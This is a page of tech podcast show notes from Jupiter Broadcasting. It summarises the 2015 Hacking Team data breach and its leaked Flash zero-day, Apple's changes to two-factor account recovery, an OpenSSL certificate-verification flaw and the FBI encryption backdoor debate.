• Toshiba owned OCZ launches new line of SSDs at $0.40/GB. Uses new flash memory and controller directly from Toshiba. Do you trust something new? From
• ID Theft Service Proprietor Gets 13 Years
• When security and politics collide: Lifespan in the SES (Senior Executive Service)
• Intel confirms tick-tock-shattering Kaby Lake processor as Moore’s Law falters

The post Butterflies & Backronyms | TechSNAP 224 first appeared on Jupiter Broadcasting.

From hacking to hacked, hacking team gets owned & what gets leaked is the best part, we’ll share the details.

Plus, a new OpenSSL vulnerability revealed, Apple tweaks their two factor authentication.. Your questions, our answers & much much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

Italian intrusion software vendor Hacking Team Breached, Data Released

• Hacking Team, a vendor known for selling spyware to governments, suffered a serious data breach
• The incident came to light Sunday evening when unnamed attackers released a torrent with roughly 400 GB of data purported to be taken from Hacking Team’s network.
• Among the more potentially damaging documents made public are invoices showing that Hacking Team has sold its intrusion software to government agencies in countries known to have oppressive regimes, including Sudan, Ethiopia, and Egypt.
• Researchers at Trend Micro have analyzed the leaked data and uncovered several exploits, including a zero-day for Adobe Flash Player.
• A readme document found alongside proof-of-concept (PoC) code for the Flash Player zero-day describes the vulnerability as “the most beautiful Flash bug for the last four years since CVE-2010-2161.”
• Adobe released a patch on July 7th 2015
• Researches also have found that the Adobe Flash zero-day has already been used in the wild.
• “In late June, we learned that a user in Korea was the attempted target of various exploits, including CVE-2014-0497, a Flash vulnerability discovered last year,” threat analyst Weimin Wu explains.
• The exploit was used to download a Trojan on the target’s computer, which then proceeds to download several other malicious payloads and create malicious processes.
• In addition to the Flash Player exploit, Trend Micro said it also spotted an exploit for a Windows kernel zero-day vulnerability in the Hacking Team leak.
• Did the “Hacking Team” find these zero days themselves? With the intent to sell them? Or did they discover them being used by others, and then added them to their own arsenal? Why were they not reported to the vendors?
• Additional Coverage: Hacking Team’s Flash 0-day exploit used against Korean targets before it was leaked
• Additional Coverage: Security Week
• Additional Coverage: CSO Online
• Additional Coverage: Net Security
• Additional Coverage: Daily Dot
• Additional Coverage: Threat Post — Update: Hacking Team to continue operations
• Hacking Team bought Flash 0-days from Russian hacker

iOS 9 will drop the recovery key from two-factor authentication

• After a hacker used social engineering against Apple Support to take over the Apple ID of Mat Honan, a Wired.com reporter, in order to take over his coveted 3 letter twitter handle, everyone raced to setup Two Factor Authentication for their Apple ID
• The hacker was able to remotely erase Honan’s iPhone and iPad, destroying personal data, family photos, and all other content.
• The hacker was able to reset the password for the Apple ID account by socially engineering the operation at Apple by using stolen information from public data, and from a hacked Amazon account
• In the aftermath, Apple promised to increase training of its support operators and improve security
• As part of this, when you enable two factor authentication, Apple issues you a recovery key. A short text string that you should print and store in a safe place
• Without it, you cannot recover your account if you lose the password
• This system is far more secure, but it has its drawbacks
• Journalist loses recovery key, and Apple ID
• If you, like Owen from the link above, lose your recovery ID, and your account is compromised or you lose your password, you have no way to get it back
• Apple has drawn a hard line in the sand, for the sake of security, they can’t recovery an account without that recovery key. You specifically asked to be protected from impersonation etc.
• In the wake of scandals such as “the fappening”, this strong stance on security makes sense
• However, Apple has decided to abandon it, because, as always, they are more focused on customer satisfaction than security.
• But, can you blame them?
• “Apple said at WWDC it would build a more integrated and comprehensive two-factor security system into its next OS releases”
• “Among other changes, the Recovery Key option that has tripped up users in the past, and led in some cases to users having to abandon an Apple ID as permanently unavailable, has been removed, an Apple spokesperson confirmed. With the new system, Apple customer support will work through a detailed recovery process with users who lose access to all their trusted devices and phone numbers.”
• Apple has posted more details about the new system on their Developer site

OpenSSL vuln revealed, while critical, not wide spread. All that hype for nothing

• “During certificate verification, OpenSSL will attempt to find an alternative certificate chain if the first attempt to build such a chain fails. An error in the implementation of this logic can mean that an attacker could cause certain checks on untrusted certificates to be bypassed, such as the CA flag, enabling them to use a valid leaf certificate to act as a CA and “issue” an invalid certificate. This issue was reported to OpenSSL by Adam Langley/David Benjamin (Google/BoringSSL).”
• Impact: “An attacker could cause certain checks on untrusted certificates, such as the
  CA (certificate authority) flag, to be bypassed, which would enable them to
  use a valid leaf certificate to act as a CA and issue an invalid certificate.”
• If you installed the OpenSSL update from June 11th, which blocks DH parameters shorter than 768 bits, your system is affected
• This issue affects OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n and 1.0.1o.
  • OpenSSL 1.0.2b/1.0.2c users should upgrade to 1.0.2d
  • OpenSSL 1.0.1n/1.0.1o users should upgrade to 1.0.1p
• Older versions of OpenSSL (1.0.0 and 0.9.8) are not affected, but reminder: support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015
• This suggests further than OpenSSL needs to separate new features from bug and security fix releases
• Why are any new features being added to OpenSSL 1.0.1?
• Shouldn’t all new development happen only in the bleeding edge version?
• Why has a sane release model not been adopted yet?

Feedback:

• SSDs and ZFS

• storing your salty password hashes

• hp-ux, owncloud investigation?

Round Up:

• FBI’s James Comey: I Know All The Experts Insist Backdooring Encryption Is A Bad Idea, But Maybe It’s Because They Haven’t Really Tried
• 14 world renowned security experts including: Whitfield Diffie, Ronald L. Rivest, and Bruce Schneier have write a paper to the US and UK governments informing them that their ask for crypto backdoors are impossible and unsafe. Keys Under Doormats: Mandating insecurity by requiring government access to all data and communications
• The FBI Spent $775K on Hacking Team’s Spy Tools Since 2011
• Click-Fraud trojan helpfully updates your flash player so you don’t get exploited by ads
• All US United Airlines Flights Are Grounded Due to “Automation Issues”
• The story of a company changing their proprietary code to an open source license
• NPR and Panoply on the economics of podcasting
• Bitcoin miners running outdated software are generating invalid blocks. However the hashing power of the invalid miners is high enough that the block chain is building on those blocks
• Windows Server 2003 end of support
• Data centers dropped into war zones

The post ZFS does not prevent Stupidity | TechSNAP 222 first appeared on Jupiter Broadcasting.

In the fight against ISIS, the FBI is making the case for US tech companies to build-in backdoors to their encryption across the board. At the same time new legislation compels social media companies to report all terrorism related activities. We’ll look at the big picture & the trends that have been leading to this.

Plus the first possible olive branch has been extended to Edward Snowden, an update on Greece, the NYSE goes down & much more!

Direct Download:

Video | MP3 Audio | OGG Audio | Torrent | YouTube

RSS Feeds:

Video Feed | MP3 Feed | OGG Feed | HD Torrent | Mobile Torrent | iTunes

Become an Unfilter supporter on Patreon:

Show Notes:

— Episode Links —

• Hacking Team says data breach put its cyberweapons in the hands of terrorists
• ‘Any govt that uses US military software is vulnerable’ – frmr MI5 officer on German missile ‘hack’ : unfilter
• FBI chief: Terrorist group turning to encrypted communications – The Washington Post
• More than 61% of Greeks say ‘No’ in crucial bailout referendum – final tally — RT News
• Emails show US officials knew of Clinton’s private email address – CSMonitor.com
• FBI & Homeland Security Now 0 For 41 In Predicting Imminent Terrorist Attacks On The US | Techdirt
• NYSE repoens after trading stopped amid United Airlines, WSJ.com tech issues | Fox News

The post Encryption McCarthyism | Unfilter 150 first appeared on Jupiter Broadcasting.